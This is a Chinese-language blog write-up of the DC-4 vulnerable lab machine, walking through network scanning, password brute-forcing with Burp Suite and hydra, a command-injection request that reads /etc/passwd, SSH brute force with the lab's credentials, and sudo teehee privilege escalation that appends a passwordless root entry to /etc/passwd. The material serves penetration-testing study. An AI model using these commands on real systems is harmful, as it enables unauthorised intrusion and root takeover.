目錄

DC-4靶機滲透測試

信息收集

web滲透

---

DC-4靶機滲透測試

DC-4對于我們來說同樣是黑盒測試

DC-4靶機MAC地址：00:0C:29:86:67:2E

kali2021：192.168.3.222/24

信息收集

1、由DC-4的mac地址獲取ip

nmap -sP 192.168.3.1/24 -oN nmap.sP??? 得知DC-4的IP為192.168.3.145

2、掃描主機所開放的端口

nmap -A 192.168.3.145 -p 1-65535 -oN nmap.A? （得知目標開放了22端口和80端口，并且80端口使用的web容器是nginx，22端口所用組件是openSSH 7.4）

3、通過瀏覽器去訪問80端口

提示可用admin來登錄，嘗試做爆破

web滲透

1、密碼爆破

上面提示用戶名為admin，嘗試使用hydra來密碼爆破

這里演示用burp suite進行爆破：

把抓到的包放到intruder模塊，做爆破！
這個爆破的密碼字典在哪？來到kali里面

密碼字典在/usr/share/john目錄下有一個password.lst，用finalshell下載到本地

來到intruder模塊，clear $，爆破的是密碼，把密碼Add $，來到payloads，把字典載入

可以點擊attack進行爆破，爆破之前點擊options，選擇線程（給500），start Attack（社區版好像不讓設置線程），爆破后得知密碼是happy

利用密碼登錄網站

2、后臺操作

登錄后臺后發現命令執行

接下來我們抓一下包，看看命令是怎么執行的

將包發送到repeater模塊

這里ls -l就可以執行一些系統命令了，可以把這些命令換成別的，換成whoami，發現能夠執行

這樣就可以判斷這里存在命令注入漏洞！

接下來：radio=cat+/etc/passwd，發現了charles，jim，sam這三個用戶，并且都存在家目錄

我們查看一下家目錄中的文件：radio=ls+-al+/home

依次看看那三個用戶的家目錄：ls -al /home/charles，一個一個看

發現在Charles中沒有特殊的文件，jim中有

我們看看backups命目錄下面有什么，看到一個舊密碼備份文件，我們看一下

將這些密碼復制到kali 創建密碼字典

再創建一個用戶字典，把那三個用戶寫進去

已經有用戶名，密碼，并且開放了22端口，嘗試爆破（hydra）

hydra -L user.dic -P old-passwords.bak ssh://192.168.3.145 -vV -o hydra.ssh

找到了用戶名和密碼，嘗試登陸（jim | jibril04）

cd /var/mail

cat jim

發現Charles直接把密碼發給jim了，Password is:? ^xHhA&hvim0y

嘗試登陸ssh

ssh charles@192.168.3.145

查看可以不需要密碼就可以使用root權限執行的命令（guid）

sudo -l

看一下charles用戶能不能sudo

發現teehee這個命令在執行期間不需要輸入root用戶密碼

teehee --help

查看幫助信息，這條命令可以在任意文件的最后追加命令

在passwd 文件末尾追加

sudo teehee -a /etc/passwd

waffle::0:0:::/bin/bash

或者 echo "waffle::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

cat /etc/passwd

嘗試ssh登陸：

ssh waffle@192.168.3.145

不過不知道我的出了什么問題導致無法這樣創建一個免密的root賬號，每次都會叫我輸入密碼，不過看網上的大部分人都成功了，就還是記錄上去

獲得root權限后去/root目錄下查看flag

總結

以上是生活随笔為你收集整理的【CyberSecurityLearning 73】DC系列之DC-4渗透测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。